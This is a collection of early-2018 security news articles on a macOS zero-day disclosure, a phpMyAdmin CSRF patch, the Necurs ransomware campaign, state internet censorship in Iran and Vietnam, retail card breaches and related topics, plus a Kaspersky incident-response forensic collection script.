Wardle found antivirus scanning could be the used for cyberespionage activities.

The expert pointed out that officials routinely classify top secret documents with the marking “TS/SCI,” (“Top Secret/Sensitive Compartmented Information),” then he added a rule to Kaspersky’s antivirus program to flag any documents that contained the “TS/SCI” marker.

To test the new rule, the researcher edited a document on his computer containing text from the Winnie the Pooh children’s book series and added “TS/SC” marker.

Kaspersky%20antivirus

As soon as the Winnie the Pooh document was saved to his machine, the Kaspersky’s antivirus software flagged and quarantined the document.

The successive phase of Wardle’s test was on discovering how flagged documents are managed, but it normal that an antivirus software send data back to the company for further analysis.

Kaspersky Lab explained that Wardle’s research is not corrected because the company is not able to deliver a specific signature or update to only one user in a stealthy way.

“It is impossible for Kaspersky Lab to deliver a specific signature or update to only one user in a secret, targeted way because all signatures are always openly available to all our users; and updates are digitally signed, further making it impossible to fake an update,” Kaspersky said in a statement.

Anyway, Wardle’s research demonstrated that hacking vendor’s platforms it is possible to use the antivirus as a search tool.

“However, a malicious or willing insider within any anti-virus company, who could tactically deployed such a signature, would likely remain undetected. And of course, in a hypothetical scenario; any anti-virus company that is coerced to, or is willing to work with a larger entity (such as a governemnt) would equally be able to stealthily leverage their product to detect and exfilitrate any files of interest.” concluded the expert.
“Sometimes the line between what is good and evil, comes down to a signal signature… “


Iran ‘s Government is reportedly blocking the Internet to calm down protests
2.1.2017 securityaffairs BigBrothers

The Iran Government is also trying to isolate the protests by blocking internet on mobile networks, authorities are blocking Instagram and messaging services like Telegram.
At least 12 people dead in the biggest challenge to the Government of the Tehran regime since mass demonstrations in 2009. The Iranian President Hassan Rouhani tried to downplay the dangerous situation, while violent protests mount across the country.

The Government is also trying to isolate the protests by blocking internet on mobile networks, multiple reports confirm the authorities are blocking social media services like Instagram and messaging services like Telegram since December 30.

“It’s a busy weekend for oppressive governments trying to suppress digital communication. Iran has blocked mobile access to at least Telegram and Instagram as it tries to thwart protests that started over economic concerns (particularly inflation), but have extended into broader resistance to the government and clerical rule.” reported the website engadget.com.

“Officials claim the censorship is meant to “maintain peace,” but the argument doesn’t hold water. Telegram founder Pavel Durov noted that his company refused to shut down “peacefully protesting channels,” and Instagram is primarily being used to document protests — Iran clearly doesn’t want to reveal the extent of the demonstrations.”


Pavel Durov

@durov
Iranian authorities are blocking access to Telegram for the majority of Iranians after our public refusal to shut down https://t.me/sedaiemardom and other peacefully protesting channels.

1:17 PM - Dec 31, 2017 · Dubai, United Arab Emirates
1,058 1,058 Replies 2,944 2,944 Retweets 5,358 5,358 likes
Twitter Ads info and privacy
The Government fears that technology could amplify the protests like happened during the Arab Spring.

“The authorities appeared to respond by cutting internet access to mobile phones, with the main networks interrupted at least in Tehran shortly before midnight” AFP reporters said.

“Several Iranian news agencies warned Telegram, the most popular social media service in the country, might soon be shut down after communications minister Mohammad-Javad Azari Jahromi accused one popular channel, Amadnews, of encouraging an “armed uprising”.”

1 Jan

Kavé Salamatian
@kavesalamatian
@bgpmon @InternetIntel Changes in Iran BGP connectivity happening right now. Seems that the full internet is getting disconnected


View%20image%20on%20Twitter
@InternetIntel
Large routing outage in Iran about 2hrs ago. pic.twitter.com/382BYEIscF

4:35 PM - Jan 1, 2018
View image on Twitter
5 5 Replies 75 75 Retweets 51 51 likes
Twitter Ads info and privacy
Iran Freedom
@4FreedominIran
#Sanandaj, January 1 - Large crowd took to streets confronting oppressive security forces. Some were arrested. (via #MEK activists in #Iran) #FreeIran #Iranprotests #IranProtests #Iran #RegimeChange

4:55 PM - Jan 1, 2018
1 1 Reply 111 111 Retweets 82 82 likes
Twitter Ads info and privacy
“How nervous the government is about losing control over the population is proportional to various control tactics they implement over the Internet,” Mahsa Alimardani, who researches internet freedoms in Iran for Article 19, told Motherboard. “In the past few hours there are also some reports of home connections (up until today mostly left undisturbed) also facing some blocks to accessing foreign web content.”

At the time I’m writing it is not clear the real effect on the Internet access by the population, in the following graph it is visible the increase in the number of directly connecting users to the Tor network.

Iran%20protests

During Iran’s elections earlier this year, Rouhani promised to cut down on censorship, but evidently, it was only political propaganda.


Force 47 – The Vietnamese brigade tasked with fighting “wrongful views” spreading online
2.1.2017 securityaffairs APT

Force 47 is a brigade composed of 10,000 cyber warriors to fight online dissent in Vietnam, a new threat to freedom of speech in the country.
Like many other Governments, also Vietnam is deploying a cyber army of 10000 cyber experts to fight online dissent in the country.

The news was revealed by a top Vietnamese general last week, the official that the brigade dubbed ‘Force 47’ has been tasked with fighting “wrongful views” spreading online.

More than half of the population (around 93 million people) has access to the Internet.

According to web watchdog Freedom House, the Internet in Vietnam is “not free”, the organization ranked it second only to China in Asia.

Human Rights Watch deputy Asia director Phil Robertson believes that the brigade Force 47 is a “shocking new dimension to Vietnam’s crackdown on dissent”.

“This is just the latest plank in a campaign to curb internet freedoms at all costs,” Shawn Crispin, Committee to Protect Journalists’ Southeast Asia representative, told AFP Friday.

“While they can’t unplug Facebook, Instagram and the likes outright, they can apply more and more pressure on those platforms and it looks like these cyber troops are their latest attempt to do that.”

The activist Nguyen Chi Tuyen (aka Anh Chi) said the new brigade is an important step in ahead of online repression.

“The main purpose for Force 47 is to try and control news and public opinion on the internet… they want to protect the party, not protect the country,” explained Tuyen.

The Vietnamese Government is applying a strict online monitoring, it continues to ask tech giants like Facebook and YouTube to remove any “toxic content” from their platforms.

The Vietnamese Government believes that hostile groups and foreign governments could use social media and the Internet to destabilize the country and threaten the “prestige of the party’s leaders and the state”.

According to Amnesty International, many dissidents have already been identified and arrested in the country, at least 15 people this year.

Madeline Earp, a senior research analyst with Freedom House, explained that the unit Force 47 is likely to include commentators tasked of spreading online pro-government content and counter critics.

“Vietnam very much follows China’s example when suppressing internet freedom, particularly when it comes to blocking websites and arresting dissidents,” she told AFP.

Vietnam had built up considerable cyber capabilities in across the years, according to the incident response firm Volexity, Vietnamese APT32 group is today one of the most advanced APTs in the threat landscape.


Expert publicly disclosed a macOS zero-day that allows local privilege escalation
2.1.2017 securityaffairs Apple

A security researcher has publicly disclosed the details of macOS zero-day flaw that can be exploited to take complete control of a system.
A security researcher that goes online with the Twitter account Siguza (@s1guza) has publicly disclosed the details of macOS zero-day vulnerability that can be exploited to take complete control of a system. The expert speculates the flaw has been around since at least 2002


Siguza
@s1guza
Fuck it, dropping a macOS 0day. Happy New Year, everyone. https://siguza.github.io/IOHIDeous/

11:59 PM - Dec 31, 2017
119 119 Replies 2,634 2,634 Retweets 4,407 4,407 likes
Twitter Ads info and privacy
The flaw is a local privilege escalation (LPE) vulnerability that affects IOHIDFamily, a kernel extension designed for human interface devices (HID) (e.g. the touchscreen, buttons, accelerometer, etc.).

The flaws discovered by the expert affect all versions of macOS and they can lead to an arbitrary read/write vulnerability in the kernel.

An attacker who has access to a system can trigger the zero-day flaw to execute arbitrary code and gain root permissions.

The expert was analyzing the iOS code searching for vulnerabilities in the iOS kernel when he discovered that the component IOHIDSystem exists only on macOS.

“I was originally looking through its source in the hope of finding a low-hanging fruit that would let me compromise an iOS kernel, but what I didn’t know it then is that some parts of IOHIDFamily exist only on macOS – specifically IOHIDSystem, which contains the vulnerability discussed herein.” Siguza wrote in the technical analysis published on gitHub.

The expert published a PoC code, dubbed IOHIDeous, that works for Sierra and High Sierra (up to 10.13.1, see README) and is able to disable both the System Integrity Protection (SIP) and Apple Mobile File Integrity (AMFI).

“Targets Sierra and High Sierra (up to 10.13.1, see README), achieves full kernel r/w and disables SIP to prove that the vulnerability can be exploited by any unprivileged user on all recent versions of macOS.” continues the expert.

The exploit code developed by the expert runs as fast as possible to avoid user interaction, for example on a shutdown “we’d be able to slip in between the user getting logged out and the kernel killing us.”

macOS%20zero-day

The PoC code published by Siguza seems not work on macOS High Sierra 10.13.2 released on December 6, but the expert believes that this version is still vulnerable.

“The prefetch timing attack I’m using for hid for some reason doesn’t work on High Sierra 10.13.2 anymore, and I don’t feel like investigating that.” said Siguza.

“Maybe patched, maybe just the consequence of a random change, I neither know nor care. The vuln is still there and my code does both info leak and kernel r/w, just not in the same binary – reason is explained in the write-up. If you want that feature, consider it an exercise for the reader.”

Siguza publicly disclosed this macOS zero-day because it is exploitable only by a local attacker and because Apple bug bounty doesn’t cover it.

1 Jan

Security Around The World
@security_china
Replying to @s1guza
Can I ask, why not sell it? I'm sure some government or blackhat would have paid a lot for it? Or are you just the type of person who can't be reasoned with, who doesn't care for money and just want to watch the world burn?


Siguza
@s1guza
My primary goal was to get the write-up out for people to read. I wouldn't sell to blackhats because I don't wanna help their cause. I would've submitted to Apple if their bug bounty included macOS, or if the vuln was remotely exploitable.

3:43 PM - Jan 1, 2018
4 4 Replies 11 11 Retweets 150 150 likes


CSRF Vulnerability in phpMyAdmin allows attackers to perform DROP TABLE with a single click!
2.1.2017 securityaffairs
Vulnerebility

The development team of phpMyAdmin has fixed a CSRF vulnerability in phpMyAdmin that could be exploited by attackers for removing items from shopping cart.
Researcher Ashutosh Barot has discovered a critical CSRF vulnerability in phpMyAdmin that could be exploited by attackers to perform malicious operations like drop tables and delete records.

phpMyAdmin developers released the version 4.7.7 that addresses the CSRF vulnerability found by Barot.

“By deceiving a user to click on a crafted URL, it is possible to perform harmful database operations such as deleting records, dropping/truncating tables etc.” reads the security advisory published by phpMyAdmin developers.

An attacker could trick a database admin into performing database operations like DROP TABLE using CSRF with devastating consequences.

“In this case, a CSRF vulnerability allows an attacker to send a crafted URL to the victim and if she (authenticated user) clicks it, the victim may perform a DROP TABLE query on her database. phpMyAdmin team considers this issue as critical vulnerability.” reads the analysis published by Ashutosh Barot.

This means that an attacker can create a crafted URL and trick the victims having an active session into performing dangerous operations without their knowledge.

The expert discovered a feature in phpMyAdmin that uses GET requests for Database operations such as DROP TABLE table_name, this means that it is possible for an attacker to trick a database admin into clicking a button and perform a database query of the attacker’s choice.

UPLOADING%201%20/%201%20%E2%80%93%20phpMyAdmin%20hack.png%20ATTACHMENT%20DETAILS%20phpMyAdmin%20hack

Ashutosh Barot also discovered that the URL for performing database operations was being saved in the browser history, an attacker can access them to gain some information about the database.

“Any query you execute by clicking insert, DROP, etc., button as shown in above image . The URL will contain database name and table name as GET request was used to perform DB Operations. URLs are stored at various places such as browser history, SIEM logs, Firewall Logs, ISP Logs, etc. this URL is always visible at client side, it can be a serious issue if you are not using SSL (some information about your previous queries were stored in someone’s logs!)” continues the analysis.

The expert pointed out that the CSRF attack worked even when the user was authenticated in cPanel and phpMyAdmin was closed after use.

The vulnerability is ranked as Medium severity because its exploitation needs the user interaction.

Below a video PoC published by Barot:

All versions prior 4.7.7 are affected by the vulnerability, users must update their installations or apply the following patches:

The following commits have been made on the 4.7 branch to fix this issue:

edd929216ade9f7c150a262ba3db44db0fed0e1b
The following commits have been made on the 4.8 branch to fix this issue:

72f109a99c82b14c07dcb19946ba9b76efc32a1b


Necurs Botnet Fuels Massive Year-End Ransomware Attacks
2.1.2017 securityweek
Ransomware
The Necurs botnet started 2017 with a four-month vacation, but ended the year sending tens of millions of spam emails daily as part of massive ransomware distribution campaigns.

Considered the largest spam botnet at the moment, Necurs was the main driver behind the ascension of the Locky ransomware (which in turn is associated with the Dridex banking Trojan) in 2016. As Necurs took a long vacation in the beginning of 2017, Locky was silent as well, but both resumed activity in April.

Over the course of 2017, however, the botnet was involved in the distribution of the Jaff, GlobeImposter, and Scarab ransomware families, as well as in 'pump-and-dump' schemes.

Over a 10-day period between December 19 and December 29, 2017, Necurs was once again involved in the distribution of ransomware, in addition to sending typical holiday-themed scam emails, data collected by AppRiver reveals.

The messages, AppRiver says, were distributing the Locky and GlobeImposter ransomware families and revealed the attackers’ preference to use malicious .vbs (Visual Basic Script) or .js (JavaScript) files located inside a .7z archive.

Consisting of between 5 and 6 million infected hosts and keeping around 1 or 2 million of them active at any given time, Necurs provides operators with remote access to the infected machines and can be used for various malicious activities, including malware downloads.

Starting on Dec. 19, the botnet was observed sending tens of millions of spam emails daily to distribute ransomware. It started at nearly 46 million emails on the first day (peaking at over 4.6 million messages per hour) and continued with over 47 million messages on Dec. 20 (peaking at 5.7 million per hour).

While the initial spam featured mainly .vbs files inside the .7z archive, .js files started appearing as well on the second day, and the traffic switched to .js files on Dec. 21-22, when it also started to taper off, at 36 million and 29 million messages per day, respectively. The botnet remained quiet from Dec. 23-25 and recommenced activity for only a couple of hours on Dec. 26.

“Hard to say why, however, I would hypothesize the operators may have been testing or monitoring the rate of infections and realized many workers are on vacation,” AppRiver’s David Pickett notes.

On Dec. 28-29, however, the botnet was highly active. It peaked at 6.5 million messages early morning on Dec. 28, but wasn’t active for long. On the next day, Necurs was observed sending nearly 59 million ransomware messages.

The malicious emails, the security researchers reveal, were masquerading as purchase orders and voicemails, but also claimed to contain images of interest to the intended victims.


Unpatched macOS Flaw Allows Code Execution, Root Access
2.1.2017 securityweek Apple
A researcher who specializes in hacking Apple’s iOS operating system has made public the details of an unpatched vulnerability in macOS that can be exploited to take complete control of a system.

The details of the exploit and proof-of-concept (PoC) code were made public on the first day of 2018 – or the last day of 2017, depending on where you are located in the world – by a researcher who uses the online moniker Siguza (s1guza). An attacker who has access to a system can leverage the vulnerability, which the expert has described as a “zero day,” to execute arbitrary code and obtain root permissions.

This local privilege escalation (LPE) vulnerability affects IOHIDFamily, a kernel extension designed for human interface devices (HID), such as a touchscreen or buttons. While trying to discover flaws that would let him hack the iOS kernel, Siguza noticed that some components of this extension, specifically IOHIDSystem, exist only on macOS, which led him to identify a potentially serious security hole.

The bugs he discovered affect all versions of macOS and they can lead to an arbitrary read/write vulnerability in the kernel. The exploit created by the hacker also disables the System Integrity Protection (SIP) and Apple Mobile File Integrity (AMFI) security features.

However, the expert pointed out that his exploit, dubbed IOHIDeous, is not stealthy as it needs to force a logout of the logged-in user. On the other hand, an attacker could design an exploit that is triggered when the targeted device is manually shut down or rebooted.

Some of the PoC code made available by Siguza only works on macOS High Sierra 10.13.1 and earlier, but the researcher believes the exploit can be tweaked to work on the latest version as well, namely 10.13.2, which Apple released on December 6.

The expert believes the vulnerability has been around since at least 2002, but some clues suggest it could actually be a decade older than that. “One tiny, ugly bug. Fifteen years. Full system compromise,” Siguza said.

The researcher said he would have reported his findings to Apple instead of disclosing them to the public if the flaw had been remotely exploitable or if the tech giant’s bug bounty program covered macOS.

SecurityWeek has reached out to Apple for comment and will update this article if the company responds.

Some may argue that making the exploit public puts macOS users at risk of attacks, but Siguza believes that is not the case.

Researcher%20discloses%20macOS%20privilege%20escalation%20zero%20day

Researcher%20discloses%20macOS%20privilege%20escalation%20zero%20day

Researcher%20discloses%20macOS%20privilege%20escalation%20zero%20day


Critical Vulnerability Patched in phpMyAdmin
2.1.2017 securityweek
Vulnerebility
An update released just before the holidays by the developers of phpMyAdmin patches a serious vulnerability that can be exploited to perform harmful database operations by getting targeted administrators to click on specially crafted links.

phpMyAdmin is a free and open source tool designed for managing MySQL databases over the Internet. With more than 200,000 downloads every month, phpMyAdmin is one of the top MySQL database administration tools.

India-based researcher Ashutosh Barot discovered that phpMyAdmin is affected by a cross-site request forgery (CSRF) flaw that can be exploited by an attacker to drop tables, delete records, and perform other database operations.

For the attack to work, an authenticated admin needs to click on a specially crafted URL. However, Barot noted that the attack works as long as the user is logged in to the cPanel web hosting administration interface, even if phpMyAdmin has been closed after use.

These types of attacks are possible due to the fact that vulnerable versions of phpMyAdmin use GET requests for database operations, but fail to provide CSRF protection.

The researcher also discovered that the URLs associated with database operations performed via phpMyAdmin are stored in the web browser history, which can pose security risks.

“The URL will contain database name and table name as a GET request was used to perform DB operations,” Barot said in a blog post published on Friday. “URLs are stored at various places such as browser history, SIEM logs, firewall logs, ISP logs, etc. This URL is always visible at client side, it can be a serious issue if you are not using SSL (some information about your previous queries were stored in someone’s logs!). Wherever the URL is being saved, an adversary can gain some information about your database.”

phpMyAdmin developers fixed the CSRF vulnerability found by Barot with the release of version 4.7.7. All prior 4.7.x versions are impacted by the security hole, which phpMyAdmin has classified as “critical.” Users have been advised to update their installations or apply the available patch.


Botnet's Huawei Router Exploit Code Now Public
2.1.2017 securityweek
Exploit
Exploit code used by the Satori botnet to compromise Huawei routers via a zero-day vulnerability became public last week, researchers have discovered.

The exploit has been used in attacks involving the Mirai variant Satori to target Huawei vulnerability CVE-2017–17215, which was unpatched at the time the first assaults started. The vulnerability was found in Huawei HG532 devices in November. Shortly after, Huawei published an advisory on how users can circumvent or prevent the exploit.

Discovered on Pastebin this Christmas, the code could fuel a spike in attempts to exploit the vulnerability. In fact, it has been already used by the destructive BrickerBot malware to target Internet of Things (IoT) devices, NewSky Security says.

In early December, the actor behind BrickerBot dumped some of the code online and announced plans to retire his project. The released code included some of the malware’s attack modules, including one that targeted said Huawei flaw, researchers have discovered.

“While analyzing this code, we also uncovered the usage of CVE-2017–17215, implying that this code has been in blackhats’ hands for a while,” NewSky reveals.

While analyzing the Satori and BrickerBot code, the security researchers noticed that the same attack vector (code injection) is present in both, which led to the conclusion that both malware developers “had copied the exploit source code from the same source.”

The security researchers also point out that the SOAP protocol (Simple Object Access Protocol) has been abused before in attacks involving IoT devices. Several Mirai variants observed last year were using two other SOAP bugs (CVE-2014–8361 and TR-64). One iteration was using them together, to increase the chances of a successful attack.

“IoT attacks are becoming modular day by day. When an IoT exploit becomes freely available, it hardly takes much time for threat actors to up their arsenal and implement the exploit as one of the attack vectors in their botnet code,” NewSky concludes.


Forever 21 confirms Payment Card Breach and provides further info on the incident
1.1.2018 securityaffairs Incindent

FOREVER 21 confirmed the presence of a malware at some point of sale (POS) systems in stores across the US.
On November 2017, the US clothes retailer FOREVER 21 announced it has suffered a security breach, the company now confirmed that hackers stole payment card data from its locations throughout the country for several months during 2017.

Even if the investigation is still ongoing, FOREVER 21 confirmed the presence of a malware at some point of sale (POS) systems in stores across the US, the malicious code was used at least between April 3, 2017, and November 18, 2017.

The payment made on the company website, forever21.com, were not affected by the incident.

The company explained that it has been using encryption technology since 2015 to protect its payment processes, but the investigation revealed that the encryption was switched off for some POS terminals at certain stores, a circumstance that allowed crooks to install the malware.

“The investigation determined that the encryption technology on some point-of-sale (POS) devices at some stores was not always on. The investigation also found signs of unauthorized network access and installation of malware on some POS devices designed to search for payment card data. The malware searched only for track data read from a payment card as it was being routed through the POS device. In most instances, the malware only found track data that did not have cardholder name – only card number, expiration date, and internal verification code – but occasionally the cardholder name was found.” reads the advisory published by the company.

“The investigation found that encryption was off and malware was installed on some devices in some U.S. stores at varying times during the period from April 3, 2017 to November 18, 2017. In some stores, this scenario occurred for only a few days or several weeks, and in some stores this scenario occurred for most or all of the timeframe.”

FOREVER 21
The company pointed out that not every POS terminal in affected stores was infected with the malware

“Each Forever 21 store has multiple POS devices, and in most instances, only one or a few of the POS devices were involved. Additionally, Forever 21 stores have a device that keeps a log of completed payment card transaction authorizations,” the company said while explaining the incident.

“When encryption was off, payment card data was being stored in this log. In a group of stores that were involved in this incident, malware was installed on the log devices that was capable of finding payment card data from the logs, so if encryption was off on a POS device prior to April 3, 2017, and that data was still present in the log file at one of these stores, the malware could have found that data.”

The company advised customers who shopped at its locations to monitor their credit transactions for any suspicious activity.


Hackers can remotely control thousands of Sonos and Bose speakers
1.1.2018 securityaffairs Hacking

Security experts at Trend Micro have demonstrated that certain models of Sonos and Bose speakers are affected by vulnerabilities that could allow attackers to hijack them.
Hackers can trigger the flaws to access the speakers and use them to play spooky sounds or to issue Alexa commands.

Only specific models of the two companies are actually affected by the issues, including the Sonos One and the Bose SoundTouch.

Attackers scan the Internet for vulnerable devices, once discovered flawed speakers they can use the API to instruct them into playing any audio file hosted at a specific URL.

“The impacted models allow any device on the same network to access the APIs they use to interface with apps like Spotify or Pandora without any sort of authentication.” reads the post published by Wired. “Tapping into that API, the researchers could simply ask the speakers to play an audio file hosted at any URL they chose, and the speakers would obey.”

speakers%20SoundofTA_Attack-Scenario-01

The experts at Trend Micro have found between 2,500 to 5,000 Sonos devices and 400 to 500 Bose devices open to audio hacking.

The attacks are more scaring in scenarios in which those voice assistant devices control smart home features from door locks, conditioners, and lighting.

“Whereas previous studies focused on seizing control of speakers like the Amazon Echo and Google Home, the results of our case study led to unique findings. These include security gaps that resulted from a simple open port that gave anyone on the internet access to the device and user information.” reads the post published by Trend Micro. “The first glaring finding was access to email addresses that are linked to music streaming services synced with the device. Another was access to a list of devices as well as shared folders that were on the same network as the test device. “

In testing devices running an older version of Sonos software, the researchers demonstrated that they leak detailed information, like the IP addresses and device IDs of gadgets that had connected to the speakers.

The attack that was theorized by Trend Micro were already reported in the wild, one Sonos customer earlier this year reported that her speaker started playing strange sounds.

Trend Micro shared its findings with Sonos, which quickly fixed the issues, including a denial-of-service (DoS) bug, while Bose still hasnìt replied.

The full report including the attack scenarios is available at the following link:

The Sound of a Targeted Attack.


Happy IR in the New Year!
1.1.2018 Kaspersky APT
At the end of last year Mr. Jake Williams from aka @MalwareJake asked a very important question about Lack of visibility during detecting APT intrusions in twitter. Results show us that endpoint analysis is the most important part of any research connected with APTs. Also, for sure endpoint forensics is critical during any Incident Response (IR) because in many cases the initial intrusion happened too far away in time so there are no relevant logs and no backups to identify the first victim and the way how attackers were moving from one computer to another. At least once a year we have such issues during IR activities with our customers. In these cases we use a very simple script that is uploaded to every Windows computer in the corporate network to collect logs, NTFS data, entries from the Windows registry and strings from the binary files to find out how exactly the attackers were moving through the network. It’s holiday season and it is our pleasure to share this script with you. We hope it will help to save a lot of time during IR and any malware/APT investigations providing the so much needed visibility into potentially infected endpoint PCs.

Let’s start with collecting the collect file system information from the computer using the wonderful forensics tool FLS (administrative privileges required) from the open source package Sleuthkit. The only thing that the official Windows build lacks is Windows XP/2003 support. If you are planning to run the tool on Windows XP/2003 machines then you may need to recompile FLS from sources using MinGW or download our our pre-compiled version (see the end of this blog post). We also do not want to write the results to the computers’ hard drive to avoid wiping its unallocated space. So the tool is going to utilize a big (approx. 300 MB free space for one corporate computer ) share folder that should be prepared in advance and should be accessible from all computer in the network that will execute the script:

set data_share=”\\corp_share\data_share”
net use y: %data_share%
mkdir y:\%COMPUTERNAME%_report
set dp=y:\%COMPUTERNAME%_report
echo %date% %time% %COMPUTERNAME% > %dp%\report.log
fls.exe -lpr \\.\c: >> %dp%\fls.log

It will take several (dozens of) minutes to create the full list of filesystem entries for the computer’s system drive. After that we are ready to extract the inode numbers of Windows registry files that are interesting to us. We will use the ICAT tool from the same Sleuthkit package and the RegLookup utility to grab modification timestamps of every windows registry key. At the end we want to collect all the strings (using the tools either by Mr. Mark Russinovich or from http://pubs.opengroup.org/onlinepubs/9699919799/utilities/strings.html tool (our choice)) from the registry files to search for any data from the unallocated space and deleted keys:

::Get Windows reg files
findstr /i “windows\/system32\/config\/system ” %dp%\fls.log | findstr /vi “profile” | findstr /vi log | cut -f2 -d” ” | cut -f1 -d”:” > %dp%\system.reg.inode
for /f “tokens=1” %%a in (%dp%\system.reg.inode) do icat \\.\c: %%a > %dp%\system.reg
findstr /i “windows\/system32\/config\/software ” %dp%\fls.log | findstr /vi “profile” | findstr /vi log | cut -f2 -d” ” | cut -f1 -d”:” > %dp%\software.reg.inode
for /f “tokens=1” %%a in (%dp%\software.reg.inode) do icat \\.\c: %%a > %dp%\software.reg
::Convert reg files
reglookup.exe %dp%\system.reg > %dp%\system.reg.log
reglookup.exe %dp%\software.reg > %dp%\\software.reg.log
::Get strings from reg files
strings -afel %dp%\system.reg > %dp%\system.str.log
strings -afeb %dp%\system.reg >> %dp%\system.str.log
strings -afel %dp%\software.reg > %dp%\software.str.log
strings -afeb %dp%\software.reg >> %dp%\software.str.log

Once finished, we are ready to do the same with the Windows system and security eventlog files. To parse log the files will we use the open source tools evtxexport and evtexport by Mr. Joachim Metz

::Get Logs
findstr -i “windows\/system32\/winevt/logs/system.evtx” %dp%\fls.log | cut -f2 -d” ” | cut -f1 -d”:” > %dp%\system.evtx.inode
for /f “tokens=1” %%a in (%dp%\system.evtx.inode) do icat \\.\c: %%a > %dp%\system.evtx
findstr /i “windows\/system32\/winevt/logs/security.evtx” %dp%\fls.log | cut -f2 -d” ” | cut -f1 -d”:” > %dp%\security.evtx.inode
for /f “tokens=1” %%a in (%dp%\security.evtx.inode) do icat \\.\c: %%a > %dp%\security.evtx
strings -afeb %dp%\system.evtx > %dp%\system.evtx.str.log
strings -afel %dp%\system.evtx >> %dp%\system.evtx.str.log
strings -afeb %dp%\security.evtx > %dp%\security.evtx.str.log
strings -afel %dp%\security.evtx >> %dp%\security.evtx.str.log
::Conv evtx
evtxexport.exe %dp%\system.evtx > %dp%\system.evtx.res.log
::get evt logs
findstr /i “windows\/system32\/config/SysEvent.Evt” %dp%\fls.log | cut -f2 -d” ” | cut -f1 -d”:” > %dp%\SysEvent.Evt.inode
for /f “tokens=1” %%a in (%dp%\SysEvent.Evt.inode) do icat \\.\c: %%a > %dp%\SysEvent.Evt
findstr /i “windows\/system32\/config/SecEvent.Evt” %dp%\fls.log | cut -f2 -d” ” | cut -f1 -d”:” > %dp%\SecEvent.Evt.inode
for /f “tokens=1” %%a in (%dp%\SecEvent.Evt.inode) do icat \\.\c: %%a > %dp%\SecEvent.Evt
::get strings from evt
strings -afeb %dp%\SysEvent.Evt > %dp%\SysEvent.Evt.str.log
strings -afel %dp%\SysEvent.Evt >> %dp%\SysEvent.Evt.str.log
strings -afeb %dp%\SecEvent.Evt > %dp%\SecEvent.Evt.str.log
strings -afel %dp%\SecEvent.Evt >> %dp%\SecEvent.Evt.str.log
::Conv evt
evtexport.exe %dp%\SysEvent.Evt > %dp%\SysEvent.Evt.res.log

Actually this is it. All logs will be collected in our share’s folder so we may search for something interesting. In the latest cases with Carbanak we were looking for mentions of the malicious Powershell scripts so let’s add the following string in our version of this script:

findstr /i “powershell” %dp%\*.log >> %dp%\report.log

This will provide us with a complete picture of how the attackers were moving from one computer to another with exact timestamps and artifacts on NTFS, registry and logs that is critical for fast and effective IR with no lack of endpoint visibility. GLHF and HAPPY IR in NEW YEAR!

PS. LINK 2 FILE

SHA256 (HappyNewYear.zip) = c166d1e150db24ea27014e1d4a9eeb79f9e317ded9918a623fee8e66a010f9fa


Vietnam's 10,000-strong 'Cyber Army' Slammed by Rights Groups
1.1.2018 securityweek BigBrothers
The deployment of 10,000 cyber warriors to fight online dissent in Vietnam adds a grim "new dimension" to controls on free speech in the Communist country, a rights group has said.

Vietnam routinely jails its critics and closely monitors activists on social media, which is not banned unlike in neighbouring China.

A top Vietnamese general this week said a 10,000-strong brigade dubbed "Force 47" has been tasked with fighting "wrongful views" spreading on the internet, according to state media reports.

It was not immediately clear what Force 47 is responsible for, but observers anticipate the cyber soldiers will escalate smear campaigns against activists online.

Rights groups rounded on the move.

Human Rights Watch deputy Asia director Phil Robertson said the cyber scouts announcement was a "shocking new dimension to Vietnam's crackdown on dissent".

Others said the tactic is designed to squeeze online critics.

"This is just the latest plank in a campaign to curb internet freedoms at all costs," Shawn Crispin, Committee to Protect Journalists' Southeast Asia representative, told AFP Friday.

"While they can't unplug Facebook, Instagram and the likes outright, they can apply more and more pressure on those platforms and it looks like these cyber troops are their latest attempt to do that."

Vietnam's internet is classified as "not free", according to web watchdog Freedom House, which ranks it second only to China in Asia.

Around half of the country's 93 million people have access to the internet, and the country also ranks among Facebook's top 10 users by numbers.

Vietnamese officials did not respond to a request for comment from AFP.

Earlier this year the government asked Facebook and YouTube to remove "toxic content" from its sites.

In August, the president called for tougher internet controls, saying that groups have used the web to launch campaigns against the government that threaten the "prestige of the party's leaders and the state".

A conservative leadership in power since last year has waged a crackdown on dissidents, with at least 15 arrested this year, according to Amnesty International.

Several other have been handed heavy jail terms, joining scores of activists already behind bars.

Force 47 is likely to include commentators hired to publish pro-government material and counter critics, said Madeline Earp, senior research analyst with Freedom House.

"Vietnam very much follows China's example when suppressing internet freedom, particularly when it comes to blocking websites and arresting dissidents," she told AFP.

For some activists, the cyber troop announcement is no surprise. But activist Nguyen Chi Tuyen said the new force marked an escalation in state tactics of repression.

"The main purpose for Force 47 is to try and control news and public opinion on the internet... they want to protect the party, not protect the country," said Tuyen, more commonly known by his online handle Anh Chi.


WeChat is set to become China’s official electronic ID system
1.1.2018 securityaffairs Mobil

China’s largest social media network, WeChat, is set to become an official electronic ID system in the country, an ID pilot program was launched in Guangzhou’s Nansha District.
WeChat (‘Weixin’ in China) is China’s largest social media network, according to Tencent Holdings, the platform had 980 million monthly active users as of late September.

A project launched by the government of Beijing could use WeChat as the official electronic personal identification system.

A WeChat ID pilot program was launched in Guangzhou’s Nansha District, citizens in the area will soon be able to identify themselves through the social network. According to Xinhua, over 30,000 people have applied for ID cards in the 24 hours following the launch of the project.

The WeChat ID could be used to authenticate citizens to online and offline government services, it will also give them access to many other online services such as hotel registration and ticketing.

The Anonymity on WeChat is not possible, China has phased in a real-name registration requirement for mobile phone numbers since 2013, and every account is associated with a mobile phone number.

WeChat

The ID programme was developed by the research institute of the Ministry of Public Security in collaboration with the Tencent’s WeChat team. Several banks in the country and many government departments have provided their support to the project.

The project aims to deter online identity theft, the system relies upon a facial recognition technology to verify applicants before their virtual ID cards get authorized.

The ID cards are available in “lightweight” format to provide a simple proof of identity while accessing services, and the “upgraded” format where more information is requested, for example, while requiring business registration.

Privacy advocates have raised concerns about the program because this public-private partnership could allow the Government to intensify it extensive surveillance and censorship activities.


A new Facebook security feature reveals fraudulent Facebook-like mails
1.1.2018 securityaffairs
Social

A new Facebook security feature protects users from identity theft, the tech giant is taking note of every email it has “recently” sent to its users.
Facebook has rolled out a new security feature to protect users from identity theft, the tech giant is taking note of every email it has “recently” sent to its users.

The full list of email sent by Facebook is available under the Settings menu on the social network platform.

Facebook users that will receive a message allegedly sent by the social network giant can check its authenticity by viewing the new “See recent emails from Facebook” section at the bottom of the Security and Login page.

Facebook%20security%20feature

If the message is not included in the list it is fraudulent and must be discarded.

